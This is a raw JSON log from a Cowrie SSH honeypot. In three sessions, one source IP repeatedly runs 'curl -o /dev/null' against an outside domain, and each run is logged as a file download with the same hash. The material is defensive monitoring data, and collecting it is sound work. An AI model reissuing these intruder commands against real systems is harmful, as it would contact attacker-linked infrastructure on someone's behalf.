{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.152406Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.155183Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.157050Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.157628Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.160046Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.161119Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.165262Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.167311Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.168185Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.196028Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.196591Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.199195Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.199799Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.205381Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.208014Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.210821Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.211486Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.236222Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.236854Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.240246Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.242538Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.245709Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.246331Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.249289Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.252306Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.252966Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.278977Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.280115Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.280617Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.318523Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.319029Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.321522Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.323592Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.324517Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.325148Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.328372Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.330623Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.359230Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.359912Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.367005Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.367415Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.371009Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.373066Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.373683Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.402098Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.405033Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.407749Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.411568Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.412197Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.414691Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.415208Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.419508Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.420157Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.452172Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.455532Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.457568Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.458245Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.460731Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.461552Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.464006Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.464822Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.469185Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.471553Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.498279Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.502191Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.503543Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.504217Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.506472Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.506943Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.508389Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.509179Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.541201Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.543838Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.546142Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.546823Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.549001Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.549457Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.551315Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.552571Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.556240Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.587898Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.588736Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.591268Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
